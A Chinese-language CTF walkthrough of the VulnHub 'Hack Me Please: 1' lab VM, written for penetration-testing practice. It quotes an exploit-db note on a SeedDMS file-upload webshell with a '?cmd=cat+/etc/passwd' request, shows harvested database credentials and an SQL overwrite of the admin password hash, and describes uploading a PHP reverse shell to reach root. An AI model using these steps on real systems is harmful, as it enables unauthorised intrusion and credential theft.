vulnhub刷題記錄(Hack Me Please: 1)
- 英文名稱 :Hack Me Please: 1
- 中文名稱 :請黑我:1
- 釋出日期 :2021 年 7 月 31 日
- 難度 :容易
- 描述 :一個完全為 OSCP 製作的簡單盒子。不需要蠻力。目標:獲取root shell
- 下載地址 :
http://www.vulnhub.com/entry/hack-me-please-1,731/
1、開機(Ubuntu_CTF)
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b5052cc01ee1d2f930b107736ab4108e02f6d6ea9fc4b7e4675f78614749aa26e.jpg)
2、主機發現(192.168.199.109)
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b068ffeaa8078fad8857800e56fae74e65059a1089ed2a511f87f2c41084786bc.jpg)
3、埠掃描(80、3306)
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229be67c430408ea67092e9adb6308926551a289463c9de047b6f4da4b4aa020c70c.jpg)
4、web首頁
Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker." -Emmanuel Goldstein 大多數黑客都很年輕,因為年輕人往往適應能力強。 只要你保持適應能力,你就永遠可以成為一名優秀的黑客。 ——伊曼紐爾·戈德斯坦
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b7f0451158766409094281aa3ebadea48826063253c0a9c7c6ab37aa8c467fd93.jpg)
5、檢視原始碼,在js註釋中找到線索
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393101ea22c25263e1b3e89c6badbaa2cef3f2933d974090209ddf60c54cfd02caf.jpg)
6、訪問頁面
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af9839378b7e2aebf6f986197371cfca244053ecf0014f045818c11515152e86b10557a.jpg)
7、查詢漏洞
searchsploit SeedDMS
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393952f8578c1e8f0fa8cbf3560aad851a633c0bdd53420c71d5cd2232ab18a4cea.jpg)
8、檢視漏洞簡介
發現需要登入之後,才能利用檔案上傳漏洞
─# find / -name "47022.txt" 2>/dev/null /usr/share/exploitdb/exploits/php/webapps/47022.txt Step 1: Login to the application and under any folder add a document. 登入到應用程式並在任何資料夾下新增一個文件。 Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used. 選擇文件作為簡單的 php 後門檔案,或者可以使用任何後門/webshell。 Step 3: Now after uploading the file check the document id corresponding to the document. 現在上傳檔案後檢查與文件對應的文件ID。 Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser. 現在轉到 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd 以在瀏覽器中獲取命令響應。 Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved. 注意:這裡的“data”和“1048576”是儲存上傳檔案的預設資料夾。
9、在conf/settings.xml中發現mysql的使用者名稱密碼
dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms"
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4bd649f08cad11208d8bef14b4a32cb98699f7222cdcbf06e05c304619160f49ce.jpg)
10、登入mysql,檢視web的使用者名稱密碼,發現登入不成功
use seeddms; show tables; select * from users; +-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229bee0f77aaac903ed6e177660f0b32d76c260d43a84f6f925783603b9028a166aa.jpg)
10、繼續檢視 tblUsers 表,找到admin的pwd
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b7feef0bb133bf2e446817a47762d847ba1c454ab0eca53524e698a854f91fb87.jpg)
11、線上破解md5,快如閃電(undefined應該是解密失敗,尷尬),發現還是無法登入
undefined
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983933e807914da923ee1a24aaf142ad4978ee965ad92c221bf15c97e5dff127d1651.jpg)
12、篡改md5值
└─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1 83b70504e0d8742dd5b66e6962eb8a35 update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin"; select login,pwd from tblUsers;
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b57af1a74ea50a5b47772ef9e1918cb55ddee5556c33ca7c2a097621cabe4ba3e.jpg)
13、繼續登入
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b9164f822549cc7eefb02e5c19c5d95e8a49c721f4864053104e21497e502daf2.jpg)
14、上傳反彈shell
使用kali自帶的php反彈shell指令碼,使用kali自帶的php反彈shell指令碼,使用kali自帶的php反彈shell指令碼
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4bc2b9b0bb75181425bf783184bf8ea3b86920627f75038647eeb5f2989446763f.jpg)
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983937468676354b85f1db8d49561a85d3a6517250247adb6c325d059773db0c0f6ef.jpg)
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229ba3fc9e3cae66790e9890bbdb7906ef641f1d540c65a230ac18cbc5775c682efd.jpg)
15、本地監聽,再點選web頁面的反彈shell
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b158ed639c8180e04fc9fe678a88333e7af151431ee8a32b2a475fe78614bbd44.jpg)
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b3a7eb27da51ae562c108245779a4fe46a71df8c5434010ea7c3a642c54d0b253.jpg)
16、切換使用者,使用users表中的使用者名稱密碼,sudo獲得root許可權
select * from users; +-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4ba6f0a8a9c787a52e73af2d758270a59a0acc6671566b4645df33fbd3cec6870c.jpg)
到此,實驗完成~
參考
- md5破解 http://pmd5.com/
「其他文章」
- vulnhub刷題記錄(hacksudo: L.P.E.)-增2
- vulnhub刷題記錄(hacksudo: L.P.E.)-增1
- ailx10的專欄電子書
- vulnhub刷題記錄(Funbox:Lunchbreaker)
- vulnhub刷題記錄(HACKABLE: II)
- vulnhub刷題記錄(Hack Me Please: 1)
- vulnhub刷題記錄(EVILBOX: ONE)
- vulnhub刷題記錄(Deathnote: 1)
- vulnhub刷題記錄(Dripping Blues: 1)
- vulnhub刷題記錄(ICA: 1)
- vulnhub刷題記錄(The Planets: Earth)
- 手機監控有什麼危害?
- SIEM和XDR下的安全分析小感悟
- 你的手機曾經被監控過嗎?
- 如何正則匹配亂碼?
- portmap 埠轉發
- socat 埠轉發
- 電腦監控是真的嗎?4個實驗一探究竟
- ufw 埠轉發
- SSH本地埠轉發